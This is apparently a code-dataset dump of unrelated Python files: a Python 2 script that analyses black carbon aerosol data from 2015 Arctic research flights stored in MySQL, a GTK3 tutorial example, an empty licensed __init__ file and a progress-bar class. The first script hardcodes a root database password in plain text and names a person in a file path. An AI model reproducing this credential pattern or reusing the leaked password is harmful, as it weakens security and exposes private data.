#lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/lookup tables/coating_lookup_table_POLAR6_2015_UBCSP2-nc(2p26,1p26)-200nmPSLcalib_used_factor446.lupckl'
flight_times = {
'science 1' : [datetime(2015,4,5,9,43),datetime(2015,4,5,13,48),15.6500, 78.2200, 'Longyearbyen (sc1)'] , #longyearbyen
#'ferry 1' : [datetime(2015,4,6,9,0),datetime(2015,4,6,11,0),15.6500, 78.2200] ,
#'ferry 2' : [datetime(2015,4,6,15,0),datetime(2015,4,6,18,0),-16.6667, 81.6000] ,
'science 2' : [datetime(2015,4,7,16,31),datetime(2015,4,7,20,48),-62.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 3' : [datetime(2015,4,8,13,51),datetime(2015,4,8,16,43),-62.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 4' : [datetime(2015,4,8,17,53),datetime(2015,4,8,21,22),-70.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 5' : [datetime(2015,4,9,13,50),datetime(2015,4,9,17,47),-62.338, 82.0,'Alert (sc2-5)'] , #Alert
##'ferry 3' : [datetime(2015,4,10,14,0),datetime(2015,4,10,17,0),-75.338, 81] ,
'science 6' : [datetime(2015,4,11,15,57),datetime(2015,4,11,21,16),-90.9408, 80.5,'Eureka (sc6-7)'] , #eureka
'science 7' : [datetime(2015,4,13,15,14),datetime(2015,4,13,20,52),-95, 80.1,'Eureka (sc6-7)'] , #eureka
##'science 8' : [datetime(2015,4,20,15,49),datetime(2015,4,20,19,49),-133.7306, 67.1,'Inuvik (sc8-10)'], #inuvik
#'science 9' : [datetime(2015,4,20,21,46),datetime(2015,4,21,1,36),-133.7306, 69.3617,'Inuvik (sc8-10)'] , #inuvik
#'science 10' : [datetime(2015,4,21,16,07),datetime(2015,4,21,21,24),-131, 69.55,'Inuvik (sc8-10)'], #inuvik
#
}
#database connection
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()
def lognorm(x_vals, A, w, xc):
return A/(np.sqrt(2*math.pi)*w*x_vals)*np.exp(-(np.log(x_vals/xc))**2/(2*w**2))
fit_bins = []
for x in range (30,800,1):
fit_bins.append(x)
plot_data={}
for flight in flight_times:
print flight
lower_alt = min_alt
start_time = flight_times[flight][0]
end_time = flight_times[flight][1]
UNIX_start_time = calendar.timegm(start_time.utctimetuple())
UNIX_end_time = calendar.timegm(end_time.utctimetuple())
while (lower_alt + alt_incr) <= max_alt:
#make data binning dicts for the interval
mass_binned_data = {}
number_binned_data = {}
i = bin_value_min
while i < bin_value_max:
mass_binned_data[i] = []
number_binned_data[i] = []
i+=bin_incr
#make arrays to hold data for each alt interval
total_mass_concs = []
total_number_concs = []
Dp_Dc_list = []
print lower_alt, ' to ' , (lower_alt + alt_incr), 'm'
#get coating data
cursor.execute(('''SELECT bc.rBC_mass_fg_jancalib, bc.coat_thickness_nm_jancalib, bc.incand_amp, bc.LF_scat_amp
FROM polar6_coating_2015 bc
JOIN polar6_flight_track_details ftd on bc.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bc.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bc.rBC_mass_fg >= %s and bc.rBC_mass_fg < %s and bc.particle_type = %s and bc.instrument = %s and bc.UNIX_UTC_ts >= %s and bc.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),coating_min_rBC_mass,coating_max_rBC_mass,'incand','UBCSP2',UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
coating_data = cursor.fetchall()
no_coats = 0
coats = []
for row in coating_data:
incand_amp = row[2]
LEO_amp = row[3]
if LEO_amp >= 45000 or LEO_amp < 0:
continue
rBC_mass = row[0]
coat_th = row[1]
core_VED = (((rBC_mass/(10**15*1.8))*6/3.14159)**(1/3.0))*10**7
if coat_th != None:
coats.append(coat_th)
Dp_Dc = ((2*coat_th)+core_VED)/core_VED
Dp_Dc_list.append(Dp_Dc)
else:
no_coats += 1
Dp_Dc_list.append(np.nan)
#print no_coats*100./len(coating_data)
#get mass data
cursor.execute(('''SELECT bnm.70t80,bnm.80t90,bnm.90t100,bnm.100t110,bnm.110t120,bnm.120t130,bnm.130t140,bnm.140t150,bnm.150t160,bnm.160t170,bnm.170t180,bnm.180t190,bnm.190t200,bnm.200t210,bnm.210t220,bnm.sampled_vol,bnm.total_mass, ftd.temperature_C,ftd.BP_Pa
FROM polar6_binned_mass_and_sampled_volume_alertcalib bnm
JOIN polar6_flight_track_details ftd ON bnm.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bnm.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bnm.UNIX_UTC_ts >= %s and bnm.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
mass_data = cursor.fetchall()
for row in mass_data:
volume_sampled = row[15]
total_mass = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_mass_conc_value = total_mass*correction_factor_for_STP/volume_sampled
total_mass_concs.append(total_mass_conc_value)
#append STP corrected mass conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
mass_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#get number data
cursor.execute(('''SELECT bnn.70t80,bnn.80t90,bnn.90t100,bnn.100t110,bnn.110t120,bnn.120t130,bnn.130t140,bnn.140t150,bnn.150t160,bnn.160t170,bnn.170t180,bnn.180t190,bnn.190t200,bnn.200t210,bnn.210t220,bnn.sampled_vol,bnn.total_number, ftd.temperature_C,ftd.BP_Pa
FROM polar6_binned_number_and_sampled_volume_alertcalib bnn
JOIN polar6_flight_track_details ftd ON bnn.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bnn.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bnn.UNIX_UTC_ts >= %s and bnn.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
number_data = cursor.fetchall()
for row in number_data:
volume_sampled = row[15]
total_number = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_number_conc_value = total_number*correction_factor_for_STP/volume_sampled
total_number_concs.append(total_number_conc_value)
#append STP corrected number conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
number_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#make lists from binned data and sort
binned_list = []
for key in mass_binned_data:
binned_list.append([key, np.mean(mass_binned_data[key])])
binned_list.sort()
number_binned_list = []
for key in number_binned_data:
number_binned_list.append([key, np.mean(number_binned_data[key])])
number_binned_list.sort()
##normalize
for row in binned_list:
row[1] = row[1]/(math.log((row[0]+10))-math.log(row[0]))
mass_conc_bins = np.array([row[0] for row in binned_list])
mass_concs = np.array([row[1] for row in binned_list])
for row in number_binned_list:
row[1] = row[1]/(math.log(row[0]+10)-math.log(row[0]))
number_conc_bins = np.array([row[0] for row in number_binned_list])
number_concs = np.array([row[1] for row in number_binned_list])
#fit with lognormal
#get Dg and sigma and write to dict
try:
popt, pcov = curve_fit(lognorm, mass_conc_bins, mass_concs)
fit_y_vals = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_y_vals.append(fit_val)
Dg = fit_bins[np.argmax(fit_y_vals)]
except:
print 'fit failure'
Dg = np.nan
#check if the fit is too far off
if popt[1] > 5 or np.isnan(Dg):
print 'sigma too high'
sigma = np.nan
Dg = np.nan
else:
sigma = math.exp(popt[1])
fraction_sampled = sum(fit_y_vals[65:220])/sum(fit_y_vals[65:480])
#add overall data to dict
mean_alt = lower_alt + alt_incr/2
if mean_alt not in plot_data:
plot_data[mean_alt] = []
plot_data[mean_alt].append([Dg,sigma,np.mean(total_mass_concs)/fraction_sampled,np.mean(Dp_Dc_list),fraction_sampled,total_number_concs,coats])
####plotting
if show_distr_plots == True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.semilogx(number_conc_bins,number_concs, color = 'g',marker='o')
ax1.semilogx(mass_conc_bins,mass_concs, color = 'b',marker='o')
ax1.semilogx(fit_bins,fit_y_vals, color = 'r',marker=None)
plt.ylabel('dM/dlog(VED)')
ax1.set_xlabel('VED (nm)')
plt.show()
lower_alt += alt_incr
cnx.close()
print 'next step . . .'
##
plot_list = []
for mean_alt in plot_data:
sampled_fraction = [row[4] for row in plot_data[mean_alt]][0]
mean_dg = np.mean([row[0] for row in plot_data[mean_alt]])
min_dg = mean_dg-np.min([row[0] for row in plot_data[mean_alt]])
max_dg = np.max([row[0] for row in plot_data[mean_alt]])-mean_dg
mean_sigma = np.mean([row[1] for row in plot_data[mean_alt]])
min_sigma = mean_sigma-np.min([row[1] for row in plot_data[mean_alt]])
max_sigma = np.max([row[1] for row in plot_data[mean_alt]])-mean_sigma
mean_mass = np.mean([row[2] for row in plot_data[mean_alt]])
p25_err = mean_mass-np.min([row[2] for row in plot_data[mean_alt]])
p75_err = np.max([row[2] for row in plot_data[mean_alt]])-mean_mass
#combined_mass_list = []
#for row in plot_data[mean_alt]:
# combined_mass_list = combined_mass_list +row[2] #concatenate lists
#median_mass = np.median(combined_mass_list)/sampled_fraction
#p25_err = median_mass-np.percentile(combined_mass_list,25)/sampled_fraction
#p75_err = np.percentile(combined_mass_list,75)/sampled_fraction -median_mass
mean_Dp_Dc = np.mean([row[3] for row in plot_data[mean_alt]])
Dp_Dc_p25_err = mean_Dp_Dc-np.min([row[3] for row in plot_data[mean_alt]])
Dp_Dc_p75_err = np.max([row[3] for row in plot_data[mean_alt]])-mean_Dp_Dc
#combined_DpDc_list = []
#for row in plot_data[mean_alt]:
# combined_DpDc_list = combined_DpDc_list +row[3] #concatenate lists
#median_Dp_Dc = np.median(combined_DpDc_list)
#Dp_Dc_p25_err = median_Dp_Dc-np.percentile(combined_DpDc_list,25)
#Dp_Dc_p75_err = np.percentile(combined_DpDc_list,75)-median_Dp_Dc
combined_numb_list = []
for row in plot_data[mean_alt]:
combined_numb_list = combined_numb_list +row[5] #concatenate lists
median_number_conc = np.median(combined_numb_list)
number_p25_err = median_number_conc-np.percentile(combined_numb_list,25)
number_p75_err = np.percentile(combined_numb_list,75)-median_number_conc
combined_coating_list = []
for row in plot_data[mean_alt]:
combined_coating_list = combined_coating_list +row[6] #concatenate lists
mean_coating = np.mean(combined_coating_list)
plot_list.append([mean_alt,mean_dg,min_dg,max_dg,mean_sigma,min_sigma,max_sigma,mean_mass,p25_err,p75_err,mean_Dp_Dc,Dp_Dc_p25_err,Dp_Dc_p75_err,median_number_conc,number_p25_err,number_p75_err])
plot_list.sort()
print mean_alt, mean_coating
altitudes = [row[0] for row in plot_list]
Dgs_mean = [row[1] for row in plot_list]
Dgs_min_err = [row[2] for row in plot_list]
Dgs_max_err = [row[3] for row in plot_list]
sigmas_mean = [row[4] for row in plot_list]
sigmas_min_err = [row[5] for row in plot_list]
sigmas_max_err = [row[6] for row in plot_list]
mass_med = [row[7] for row in plot_list]
mass_25 = [row[8] for row in plot_list]
mass_75 = [row[9] for row in plot_list]
Dp_Dc_med = [row[10] for row in plot_list]
Dp_Dc_25 = [row[11] for row in plot_list]
Dp_Dc_75 = [row[12] for row in plot_list]
number_med = [row[13] for row in plot_list]
number_25 = [row[14] for row in plot_list]
number_75 = [row[15] for row in plot_list]
fig = plt.figure(figsize=(12,12))
upper_alt = 6500
ax1 = plt.subplot2grid((2,2), (0,0), colspan=1)
ax2 = plt.subplot2grid((2,2), (0,1), colspan=1)
ax3 = plt.subplot2grid((2,2), (1,0), colspan=1)
ax4 = plt.subplot2grid((2,2), (1,1), colspan=1)
#ax5 = plt.subplot2grid((3,2), (1,1), colspan=1)
ax1.errorbar(Dgs_mean,altitudes,xerr = [Dgs_min_err,Dgs_max_err],fmt='o',linestyle='-', color = 'b')
ax1.set_ylabel('altitude (m)')
ax1.set_xlabel('Dg (from dM/dlog(D) ng/m3-STP)')
ax1.set_xlim(100,220)
ax1.set_ylim(0,upper_alt)
ax2.errorbar(sigmas_mean,altitudes,xerr = [sigmas_min_err,sigmas_max_err],fmt='o',linestyle='-', color = 'grey')
ax2.set_xlabel('sigma (from dM/dlog(D) ng/m3-STP)')
ax2.set_ylabel('altitude (m)')
ax2.set_xlim(1,2)
ax2.set_ylim(0,upper_alt)
ax3.errorbar(mass_med,altitudes,xerr = [mass_25,mass_75],fmt='o',linestyle='-', color = 'green')
ax3.set_xlabel('total mass conc (ng/m3 - STP)')
ax3.set_ylabel('altitude (m)')
ax3.set_xlim(0,100)
ax3.set_ylim(0,upper_alt)
ax4.errorbar(Dp_Dc_med,altitudes,xerr=[Dp_Dc_25,Dp_Dc_75],fmt='o',linestyle='-', color = 'red')
ax4.set_xlabel('Dp/Dc (rBC cores from 160-180nm)')
ax4.set_ylabel('altitude (m)')
ax4.set_xlim(0.8,2.4)
ax4.set_ylim(0,upper_alt)
#ax5.errorbar(number_med,altitudes,xerr=[number_25,number_75],fmt='o',linestyle='-', color = 'm')
#ax5.set_xlabel('total number conc (#/cm3 - STP)')
#ax5.set_ylabel('altitude (m)')
#ax5.set_xlim(0,50)
#ax5.set_ylim(0,upper_alt)
##ax5.set_xscale('log')
#fig.suptitle('Science Flights 1-7', fontsize=20)
dir = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/'
os.chdir(dir)
if savefig == True:
#plt.savefig('altitude dependent plots - '+flight_times[flight][4]+' - cloud-free.png', bbox_inches='tight')
plt.savefig('altitude dependent plots Dp sig mass DpDc - sc1-7 - cloud-free.png', bbox_inches='tight')
plt.show()
|
Programmica/python-gtk3-tutorial
|
refs/heads/master
|
_examples/cellrendererpixbuf.py
|
1
|
#!/usr/bin/env python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import GdkPixbuf
class CellRendererPixbuf(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self)
self.set_title("CellRendererPixbuf")
self.connect("destroy", Gtk.main_quit)
liststore = Gtk.ListStore(str, GdkPixbuf.Pixbuf)
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/fedora.ico", 16, 16)
liststore.append(["Fedora", icon])
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/opensuse.ico", 16, 16)
liststore.append(["OpenSuSE", icon])
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/gentoo.ico", 16, 16)
liststore.append(["Gentoo", icon])
treeview = Gtk.TreeView()
treeview.set_model(liststore)
self.add(treeview)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn = Gtk.TreeViewColumn("Distribution")
treeview.append_column(treeviewcolumn)
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 0)
cellrendererpixbuf = Gtk.CellRendererPixbuf()
treeviewcolumn = Gtk.TreeViewColumn("Logo")
treeview.append_column(treeviewcolumn)
treeviewcolumn.pack_start(cellrendererpixbuf, False)
treeviewcolumn.add_attribute(cellrendererpixbuf, "pixbuf", 1)
window = CellRendererPixbuf()
window.show_all()
Gtk.main()
|
aweinstock314/servo
|
refs/heads/master
|
tests/wpt/harness/wptrunner/__init__.py
|
1447
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
|
Winterflower/mdf
|
refs/heads/master
|
mdf/lab/progress.py
|
3
|
import sys
import uuid
from mdf.remote import messaging
_fmt = "%Y-%m-%d %H:%M:%S"
class ProgressBar(object):
def __init__(self, start_date, end_date):
# this is only approximate as it doesn't take weekends into account
self.start_date = start_date
self.num_days = (end_date - start_date).days
self._date = start_date
self.prog_bar = '[]'
self.fill_char = '*'
self.width = 40
self.set_date(self.start_date)
# register our callback with the messaging api
self._subj = uuid.uuid1()
messaging.register_message_handler(self._subj, self.__msg_callback)
def __call__(self, date, ctx):
# send to the parent process (or call directly if this is the parent process)
messaging.send_message(self._subj, date)
def __del__(self):
try:
# this will fail in the child processes but just ignore it
messaging.unregister_message_handler(self._subj, self.__msg_callback)
except RuntimeError:
pass
def __msg_callback(self, subject, date):
if date <= self._date:
return
self.set_date(date)
sys.stdout.write("\r")
sys.stdout.write(str(self))
sys.stdout.flush()
def set_date(self, date):
done = float((date - self.start_date).days)
self.__update_amount((done / self.num_days) * 100.0)
self.prog_bar += \
' processed %s - %d of %s days complete' % (date.strftime(_fmt), done, self.num_days)
self._date = date
def __update_amount(self, new_amount):
percent_done = int(round((new_amount / 100.0) * 100.0))
all_full = self.width - 2
num_hashes = int(round((percent_done / 100.0) * all_full))
self.prog_bar = '[' + self.fill_char * num_hashes + ' ' * (all_full - num_hashes) + ']'
pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))
pct_string = '%d%%' % percent_done
self.prog_bar = self.prog_bar[0:pct_place] + \
(pct_string + self.prog_bar[pct_place + len(pct_string):])
def __str__(self):
return str(self.prog_bar)
def combine_result(self, other, other_ctx, ctx):
self.set_date(other_ctx.get_date())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.